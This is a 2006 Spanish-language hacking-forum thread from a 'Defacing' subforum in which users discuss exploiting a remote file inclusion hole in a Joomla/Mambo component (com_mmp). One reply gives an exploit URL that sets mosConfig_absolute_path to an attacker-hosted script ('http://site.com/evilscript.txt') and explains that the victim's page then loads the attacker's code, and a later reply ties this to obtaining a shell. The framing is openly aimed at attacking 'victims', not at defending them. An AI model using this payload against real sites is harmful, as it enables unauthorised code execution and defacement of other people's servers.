Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 29, 2008, 06:36:01
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema:  (Leído 569 veces)
VanNovax
Visitante
« en: ſeptiembre 01, 2006, 11:36:33 »
En línea
Kr0sty
Miembro
*****
Desconectado Desconectado

Mensajes: 115


Aprendiendo :)

krosty@pcultimate.net
Ver Perfil Email
« Respuesta #1 en: ſeptiembre 01, 2006, 05:41:49 »
Gracias amigo  Wink
Ahora no entendi bien lo del path, ni como encontrar esta vulnerabilidad, es decir
Citar
<?php
       global $mosConfig_absolute_path;
       require $mosConfig_absolute_path ."/administrator/components/com_mmp/diagnostics.mmp.php";
       diagnostics();
?>


Esto donde deberia estar?

Salu2 y gracias
En línea








anonimox
Habitual
*****
Desconectado Desconectado

Mensajes: 277



Ver Perfil Email
« Respuesta #2 en: ſeptiembre 02, 2006, 06:28:17 »
Cita de: Kr0sty en ſeptiembre 01, 2006, 05:41:49
Gracias amigo  Wink
Ahora no entendi bien lo del path, ni como encontrar esta vulnerabilidad, es decir
Citar
<?php
       global $mosConfig_absolute_path;
       require $mosConfig_absolute_path ."/administrator/components/com_mmp/diagnostics.mmp.php";
       diagnostics();
?>


Esto donde deberia estar?

Salu2 y gracias



sino me equivoco eso deberia estar en la pagina de la victima. 
Es por eso que cuando queremos explotar ponemos asi
Exploit:
Citar

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion[path]/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://site.com/evilscript.txt?

Donde
Citar

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
es la pagina donde se ecuentra nuestro exploit.

O sea que funciona mas o menos asi
Desde la pagina de la victima se importa un archivo desde otro hosting donde esta el exploit.

Salu2
En línea

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion  - Servidor para subir cosas sobre hacking

                                          ? \!/ ?
                                           (o o)
------------------------------OOo-(_)-oOOo------------------------

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Kr0sty
Miembro
*****
Desconectado Desconectado

Mensajes: 115


Aprendiendo :)

krosty@pcultimate.net
Ver Perfil Email
« Respuesta #3 en: ſeptiembre 02, 2006, 10:19:58 »
Ok, y esto :
Citar
[path]
Que seria ?
Salu2
En línea








VanNovax
Visitante
« Respuesta #4 en: ſeptiembre 02, 2006, 10:44:07 »
Path es una asignacion que da El programar en Php.

(Por ocio) o por configuracion General.

path siempre cambia por otra cosa.

Pero no le pares eso.

Creo que anonimo explico lo que devi haber explicado  Wink
En línea
Kr0sty
Miembro
*****
Desconectado Desconectado

Mensajes: 115


Aprendiendo :)

krosty@pcultimate.net
Ver Perfil Email
« Respuesta #5 en: ſeptiembre 02, 2006, 12:41:32 »
Citar
Path es una asignacion que da El programar en Php.

(Por ocio) o por configuracion General.

path siempre cambia por otra cosa.

Perdonen mi ignorancia pero sigo sin entender  :'(

Un ejemplo aho? asi me ubico un poco mas.

Salu2
En línea








VanNovax
Visitante
« Respuesta #6 en: ſeptiembre 02, 2006, 05:31:39 »
Voy saliendo:

mosConfig_absolute_path

Supango que es page


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

page y mosConfig_absolute_path

Son un nombre para una Accion Determinada!.

Dentro del Nucleo!!

Cuando nosotros buscamos shell.

Simplemente, ejecutamos el Nucleo en el Entorno Http


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Ejemplo:

mosConfig_absolute_path le di la accion de que busque a /archivos/admin/index.php

sin restricciones (Remote File Inclussion Seguro)

Eso puede Cambiar.

Lo que devez de Dar un Repaso en php.

Esto ya no es defacing.
En línea
Twister-Hack
Visitante
« Respuesta #7 en: Noviembre 08, 2006, 03:27:46 »
Veo que el path siempre es como los de linux, quiere decir eso que los servidores de las webs son todos Unix?
En línea
PowaZor(Ele)
Miembro
*****
Desconectado Desconectado

Mensajes: 110



Ver Perfil
« Respuesta #8 en: Noviembre 08, 2006, 04:32:47 »
Cita de: Twister-Hack en Noviembre 08, 2006, 03:27:46
Veo que el path siempre es como los de linux, quiere decir eso que los servidores de las webs son todos Unix?


Tambien hay Windows  Grin
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC